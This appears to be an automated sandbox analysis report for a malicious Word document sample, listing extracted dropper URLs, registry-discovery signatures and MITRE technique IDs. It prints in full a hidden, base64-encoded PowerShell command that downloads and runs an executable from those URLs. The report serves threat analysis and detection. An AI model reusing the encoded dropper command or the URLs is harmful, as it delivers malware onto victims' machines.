560d99887286ea550542c684b208ab356394e22d45571c64765653543fbf1dd3

General

Target

Malware Samples(2).zip
Sample

200101-1ltvh4rn42
SHA256

560d99887286ea550542c684b208ab356394e22d45571c64765653543fbf1dd3

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://maelkajangcanopy.com/wp-admin/JBiRPnVvr/

exe.dropper

https://stylewebcruze.online/images/WLReuvW/

exe.dropper

https://stperformance.co.uk/wp-admin/toubufsC/

exe.dropper

http://jandmadventuring.servermaintain.com/wp-content/uploads/cjy4-j423i30-616378266/

exe.dropper

https://www.liuxuebook.com/wp-content/BEtxnxQWn/

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4592	Powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4944	WINWORD.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4944	WINWORD.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4944	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4592	5036	Powershell.exe	73

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4592	Powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\VTDLd0e4b059d5c97b52ec3da799066cf7a7.danger.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4944

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABIAGIAbABvAHQAbwBnAHYAPQAnAFYAcQByAG0AbgBqAHYAagBjAGUAYwB3ACcAOwAkAFkAZQB5AHUAeABtAGYAdQBjAGkAcQBwAGIAIAA9ACAAJwA0ADkAOAAnADsAJABLAG8AbAB6AG8AcgBxAHgAdQBtAD0AJwBUAG0AagByAGoAaQBjAGMAdgBuAGgAcAB6ACcAOwAkAFAAagBuAGkAZQBnAHIAdAB3AHUAaABsAGkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFkAZQB5AHUAeABtAGYAdQBjAGkAcQBwAGIAKwAnAC4AZQB4AGUAJwA7ACQAWQByAHoAawBvAHQAYgBqAGEAPQAnAEEAYQBmAHQAeAB6AGgAagBiAHgAcwBtACcAOwAkAFcAdABiAHgAZAB1AGYAYgB6AGoAPQAuACgAJwBuAGUAJwArACcAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAEIAYwBsAGkAZQBOAFQAOwAkAEEAbgBqAHgAdQBkAHUAeQBuAGsAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAZQBsAGsAYQBqAGEAbgBnAGMAYQBuAG8AcAB5AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBKAEIAaQBSAFAAbgBWAHYAcgAvACoAaAB0AHQAcABzADoALwAvAHMAdAB5AGwAZQB3AGUAYgBjAHIAdQB6AGUALgBvAG4AbABpAG4AZQAvAGkAbQBhAGcAZQBzAC8AVwBMAFIAZQB1AHYAVwAvACoAaAB0AHQAcABzADoALwAvAHMAdABwAGUAcgBmAG8AcgBtAGEAbgBjAGUALgBjAG8ALgB1AGsALwB3AHAALQBhAGQAbQBpAG4ALwB0AG8AdQBiAHUAZgBzAEMALwAqAGgAdAB0AHAAOgAvAC8AagBhAG4AZABtAGEAZAB2AGUAbgB0AHUAcgBpAG4AZwAuAHMAZQByAHYAZQByAG0AYQBpAG4AdABhAGkAbgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBjAGoAeQA0AC0AagA0ADIAMwBpADMAMAAtADYAMQA2ADMANwA4ADIANgA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBsAGkAdQB4AHUAZQBiAG8AbwBrAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AQgBFAHQAeABuAHgAUQBXAG4ALwAnAC4AIgBzAGAAcABsAEkAVAAiACgAJwAqACcAKQA7ACQASgBvAHIAdwBnAHYAYQB0AGsAcgBmAD0AJwBRAGcAcgBjAGoAdwBvAGgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFUAdQBkAHAAYQBjAGgAdQBoACAAaQBuACAAJABBAG4AagB4AHUAZAB1AHkAbgBrACkAewB0AHIAeQB7ACQAVwB0AGIAeABkAHUAZgBiAHoAagAuACIARABPAHcAbgBMAG8AYABBAGAARABGAGAASQBMAEUAIgAoACQAVQB1AGQAcABhAGMAaAB1AGgALAAgACQAUABqAG4AaQBlAGcAcgB0AHcAdQBoAGwAaQApADsAJABDAHAAaQBpAHEAdABpAGYAZQBnAHcAZQBlAD0AJwBUAGEAdQBoAHAAbgBuAGMAeABxACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAUABqAG4AaQBlAGcAcgB0AHcAdQBoAGwAaQApAC4AIgBsAGUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIAMgAyADYAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAHIAVAAiACgAJABQAGoAbgBpAGUAZwByAHQAdwB1AGgAbABpACkAOwAkAEoAcQBlAGcAaAByAG8AaAB5AG4AawBhAD0AJwBBAHAAZgBtAGIAaABxAHAAdwB0ACcAOwBiAHIAZQBhAGsAOwAkAEsAcABuAGsAcgBuAGoAbwB3AG8AYgA9ACcATQB3AGYAdgBtAGsAaABuAGEAbQBuAHMAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABEAHUAdQBrAGcAdABoAHoAPQAnAFYAeABxAG4AcQBtAG4AcABvAG8AawAnAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:4592

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4944-2-0x0000024576850000-0x0000024576853000-memory.dmp

Filesize
12KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads